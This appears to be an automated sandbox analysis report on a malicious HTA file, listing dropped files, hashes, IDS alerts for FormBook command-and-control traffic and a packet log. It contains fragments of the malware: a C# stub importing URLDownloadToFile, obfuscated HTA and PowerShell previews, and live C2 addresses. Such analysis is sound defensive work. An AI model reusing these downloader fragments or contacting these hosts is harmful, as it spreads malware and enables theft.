                                                                                                                                                      Size (bytes):196608
                                                                                                                                                      Entropy (8bit):1.1239949490932863
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                      MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                      SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                      SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                      SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Thu Dec 5 06:34:55 2024, 1st section name ".debug$S"
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1340
                                                                                                                                                      Entropy (8bit):3.97976169240799
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:HsK9ocajv/ykaH8wKcjmfwI+ycuZhNSDakSVMPNnqSed:GZjv/yBjK2mo1ulOa36qS+
                                                                                                                                                      MD5:49259636E57B707915D5FDF334549C22
                                                                                                                                                      SHA1:1FB5661CDA1B9740103B3443982D21557046D36A
                                                                                                                                                      SHA-256:61096E017A5BA6AEBC0D90AF0AA8DF6EF1C1F1DA39CFACCEA3A01D796635127C
                                                                                                                                                      SHA-512:209699F78625EEA5911B274F01CC73D2B669FE5021A28F18320C6537C6E19B7B7F425155D4EBE779CD51F448CB4BF7CD425930EF5F5FF1BDB02A46790250FD43
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:L....IQg.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........V....c:\Users\user\AppData\Local\Temp\dtaz5slk\CSCC90739EC0644DC2B3B75DC9F86B7B59.TMP..................SG0=p...0X..............7.......C:\Users\user\AppData\Local\Temp\RES5695.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.t.a.z.5.s.l.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                      File Type:MSVC .res
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):652
                                                                                                                                                      Entropy (8bit):3.098977814938013
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry06Gak7YnqqV6XPN5Dlq5J:+RI+ycuZhNSDakSVMPNnqX
                                                                                                                                                      MD5:E55347303D70F90E1D30580FEAD4E2A1
                                                                                                                                                      SHA1:423E48A499E3D0FD453BB9EE832D6D6FBAA01598
                                                                                                                                                      SHA-256:595F25C50400766A7885A115EA4F7BF96A575E9586606D982B56BB09D7EAF8E6
                                                                                                                                                      SHA-512:DB48A6B6B602C6D5A9E24E1677521FFAA2F1B84EC2DB1C73B7BB2DC813B8B6F7CE132777028F8FB7B7014B39CE54A6BC24CA1E67D865FBF87FCD9FBFA3FC473D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.t.a.z.5.s.l.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...d.t.a.z.5.s.l.k...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (347)
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):464
                                                                                                                                                      Entropy (8bit):3.778677795474975
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:V/DsYLDS81zuIeH012mMGbJJQXReKJ8SRHy4HW4KYKT46Qy:V/DTLDfuIwKyXfHqDs6Qy
                                                                                                                                                      MD5:467F968BF8CBA56E9FB63BC18E3D9BD9
                                                                                                                                                      SHA1:1D1ACD9472B4D6B81A4C1031C742A260E10ADDFD
                                                                                                                                                      SHA-256:FADF7FC663E8A75FD9915BB9E98D899BC02270F552E47822CDC23CC208A326D4
                                                                                                                                                      SHA-512:004DE62BF3FEAF85154B1EB203108A44775B35E81F90C2DFE3E717996F56B09D703AB14C8EF1D2786DEB94CAA403E5AF4C65AC8B5D52675C64CA8FFC4452369D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.using System;.using System.Runtime.InteropServices;..namespace rITSBqyIB.{. public class jzjh. {. [DllImport("urLmON.dlL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr QmQh,string D,string KLayUeqJeo,uint dM,IntPtr KpA);.. }..}.
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (372), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):375
                                                                                                                                                      Entropy (8bit):5.196548279697297
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fKJOabJOt0zxs7+AEszIN723fKJOabJO:p37Lvkmb6K2aSNb40WZETaSNba9n
                                                                                                                                                      MD5:69BF8AA3767DBB75314C53FD544F4D11
                                                                                                                                                      SHA1:9BAA3484E5099C75A4A47D145849C42EFB78D661
                                                                                                                                                      SHA-256:E4CF3F636CEAB3D6E7129617D05A40AFF09CD8CC30A450D25DEF6C4F6B08E733
                                                                                                                                                      SHA-512:068F0955D07617E6C7D30E905575DAD1F9206B5478891ACCA29EAA86500EC97E6468DFC157635473FD5B15E3726D81837913EE71631ACC8A1BD82A65B76B84C1
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.0.cs"
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3072
                                                                                                                                                      Entropy (8bit):2.816178663259939
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:etGS6PBu5exl8skOgkeYMq/jz3LFPtkZfJ4GA+xCjcUWI+ycuZhNSDakSVMPNnq:6Rsx+//YMcgJQoCA31ulOa36q
                                                                                                                                                      MD5:51592476C00B9D60D047F44F92D56CB9
                                                                                                                                                      SHA1:63B1974536FBAC4670A8C0AF4C71AA0971C14C9D
                                                                                                                                                      SHA-256:934684614F3F4CE58A26CBA592ECD9FA743BBDDA158410B68F29682E5D2CDB5C
                                                                                                                                                      SHA-512:479C8A2D0C38644ECE393F8ACB7C43C7D80C930D057184A671FCFACF7E59ECE05E19D4178DB2B2A4BCD530BAB8EFD858BE92E3B987572BB7D72929424C900AB8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....IQg...........!.................#... ...@....... ....................................@.................................T#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....n.....n.......................................... =.....P ......O.........U.....Z.....\.....g.....j...O.....O...!.O.....O.......!.....*.......=.......................................&..........<Module>.dt
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (455), with CRLF, CR line terminators
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):876
                                                                                                                                                      Entropy (8bit):5.286501734654573
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:KOuqd3ka6K2aoyETaoe9uKax5DqBVKVrdFAMBJTH:yika6CoyE+oe9uK2DcVKdBJj
                                                                                                                                                      MD5:253E83BFD499466CE881DA176FB97216
                                                                                                                                                      SHA1:B1D40F6F1DD5E26AF5B06887EEF73669B5812891
                                                                                                                                                      SHA-256:810F42EC4078D8E8D7BD3AECC4B017A1432A6076C2358F503ACC3F9CCE5682BD
                                                                                                                                                      SHA-512:D6DB275BEDA9ADE5C9F3F03BFED85BC51358F1402B9B651D59B3EE15CB6DEE1BB6F15B417ADF3E84518502CF3004D6E97D514E0CDCA8638B5A45F5DFD76BFDC5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (3312), with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):154122
                                                                                                                                                      Entropy (8bit):3.797078519180834
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:AeCzex8lzZz7iH9LcVKCeCzex8lzZz7iH9LcVK0eCzex8lzZz7iH9LcVKv:rCq6byowtCq6byowXCq6byowv
                                                                                                                                                      MD5:36525DA89F51430CBE32984C7B02386C
                                                                                                                                                      SHA1:264C384FC9CC6A9653D89B1683B2CBA64FDDBDD3
                                                                                                                                                      SHA-256:291D319C93575A83DA2C4F10F34848CAA5CED7996D433BDA9A713C5ABE4E418A
                                                                                                                                                      SHA-512:26AC864262759E211F33E8EEBA219856A82C9C721B0A69D989E59632B415531C05B547A348B3C29D7B4C9B3AC2050B93EB58D0FE3CBFC10AEA9ABA71D79C2455
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview:...... . . . .....B.b.q.L.L.G.m.L.W.Q.a.O.G.J.K. .=. .".A.N.O.J.i.c.U.G.L.k.Z.L.G.t.e.".....h.L.z.K.c.c.P.g.N.Z.i.q.d.l.O. .=. .".Z.I.t.z.J.W.u.K.L.c.B.m.A.L.U.".....O.b.s.L.G.h.u.K.c.q.z.k.i.u.L. .=. .".i.W.l.W.m.G.z.r.c.r.s.k.e.o.U.".........I.c.h.L.p.N.P.k.L.c.i.H.s.P.L. .=. .".h.t.G.t.u.W.j.z.d.d.G.S.i.T.h.".....o.o.C.W.U.L.k.A.k.b.P.c.p.J.K. .=. .".L.p.m.C.z.r.u.m.L.C.W.B.U.G.i.".....e.x.R.o.W.Q.c.B.z.A.e.W.N.B.L. .=. .".K.i.B.J.e.L.x.x.L.W.v.W.L.q.q.".....L.e.H.K.c.L.H.k.z.h.h.R.e.h.o. .=. .".l.W.N.g.e.u.t.t.W.z.K.z.o.L.k.".....i.i.k.P.e.n.c.i.G.N.n.j.a.g.e. .=. .".W.R.q.m.k.z.U.R.i.K.x.f.e.K.B.".....L.A.d.s.L.k.Z.z.z.r.q.L.G.a.N. .=. .".R.b.c.N.Z.i.L.u.z.P.v.c.f.A.K.".....e.n.W.L.L.K.p.n.s.L.h.c.i.x.G. .=. .".L.O.W.p.q.n.p.p.k.C.i.Q.q.W.Z.".....P.c.c.n.u.W.U.k.G.L.a.L.Z.L.d. .=. .".b.p.i.k.G.W.i.i.L.i.k.W.a.e.U.".....N.C.P.C.x.L.W.U.B.L.R.J.x.v.c. .=. .".O.L.W.b.p.b.r.R.h.S.G.U.P.R.A.".....W.N.d.C.K.q.c.L.Z.d.L.N.h.p.I. .=. .".b.l.t.e.K.n.R.A.B.W.i.m.Q.n.L.".....W.x.U.J.i.i.e.c.
                                                                                                                                                      File type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                      Entropy (8bit):2.149546896656599
                                                                                                                                                      TrID:
                                                                                                                                                        File name:maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta
                                                                                                                                                        File size:159'618 bytes
                                                                                                                                                        MD5:7b5d04515a8b84877cd75427ec392b85
                                                                                                                                                        SHA1:6013f960a5832b92b2ee8347c208761dc0a24d58
                                                                                                                                                        SHA256:e639ef803c3d793f9f0f3a9e4bca874b78e278f9be248103b7a691dbbfbf7b69
                                                                                                                                                        SHA512:0afb384e76c071079eca07174cf301ef85c3f62b928bf1604939bd6697576844061f7d2c385f1ef388b4b6f7f3ca7d7d9764996715d36750122d26bfd6d94653
                                                                                                                                                        SSDEEP:96:4owZw9d6yfajsbUoJ3S46INpy7AE5INVWa2pCbFCbUoJ3S46INpy7AD5INVWa2p5:4Lwaq+xOixqDckQ
                                                                                                                                                        TLSH:15F3C341E93400EDFAFD5E9BB5BDA54E35A423579FC99D8D4227FB80D8A338EA4408C4
                                                                                                                                                        File Content Preview:<script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253CScript%2520Language%253D%2527Javascript%2527%253E%250A%253C%2521--%2520HTML%2520Encryption%2520provided%2520by%2520tufat.com%2520--%253E%250A%253C%2521--%250Adocument.write%252
                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                        2024-12-05T05:37:58.770647+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.649707172.245.123.380TCP
                                                                                                                                                        2024-12-05T05:38:53.469246+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649821208.91.197.2780TCP
                                                                                                                                                        2024-12-05T05:39:10.722550+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6498633.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:39:13.388616+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6498703.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:39:16.040314+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6498763.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:39:18.701814+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6498863.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:39:25.456038+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499033.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:39:28.113587+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499103.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:39:30.770847+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499173.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:39:33.432874+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6499233.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:39:40.396437+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649940104.21.31.24980TCP
                                                                                                                                                        2024-12-05T05:39:43.051583+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649947104.21.31.24980TCP
                                                                                                                                                        2024-12-05T05:39:45.708858+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649955104.21.31.24980TCP
                                                                                                                                                        2024-12-05T05:39:48.442295+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649963104.21.31.24980TCP
                                                                                                                                                        2024-12-05T05:39:55.294162+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499773.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:39:57.962029+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499843.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:40:00.619088+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499913.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:40:03.279319+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6499993.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:40:10.150210+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650005162.213.249.21680TCP
                                                                                                                                                        2024-12-05T05:40:12.810690+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650006162.213.249.21680TCP
                                                                                                                                                        2024-12-05T05:40:15.691616+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650008162.213.249.21680TCP
                                                                                                                                                        2024-12-05T05:40:18.370663+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650009162.213.249.21680TCP
                                                                                                                                                        2024-12-05T05:40:25.293933+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001062.149.128.4080TCP
                                                                                                                                                        2024-12-05T05:40:27.948398+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001162.149.128.4080TCP
                                                                                                                                                        2024-12-05T05:40:30.771520+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001262.149.128.4080TCP
                                                                                                                                                        2024-12-05T05:40:33.261303+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65001362.149.128.4080TCP
                                                                                                                                                        2024-12-05T05:40:39.986732+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500143.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:40:42.635660+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500153.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:40:45.288783+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500163.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:40:47.944401+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6500183.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:40:54.793403+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500193.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:40:57.448428+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500203.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:41:00.248282+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500213.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:41:02.765732+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6500223.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:41:10.286313+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650023154.82.100.17780TCP
                                                                                                                                                        2024-12-05T05:41:12.942530+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650024154.82.100.17780TCP
                                                                                                                                                        2024-12-05T05:41:15.614420+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650025154.82.100.17780TCP
                                                                                                                                                        2024-12-05T05:41:18.279464+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650026154.82.100.17780TCP
                                                                                                                                                        2024-12-05T05:41:25.333244+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650028199.115.230.22280TCP
                                                                                                                                                        2024-12-05T05:41:27.989483+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650029199.115.230.22280TCP
                                                                                                                                                        2024-12-05T05:41:30.645739+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650030199.115.230.22280TCP
                                                                                                                                                        2024-12-05T05:41:53.689481+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650031199.115.230.22280TCP
                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Dec 5, 2024 05:37:57.542269945 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:57.662178993 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:57.662452936 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:57.662452936 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:57.782289028 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:58.770580053 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:58.770606041 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:58.770617008 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:58.770647049 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:58.770658970 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:58.770674944 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:58.770687103 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:58.770723104 CET4970780192.168.2.6172.245.123.3
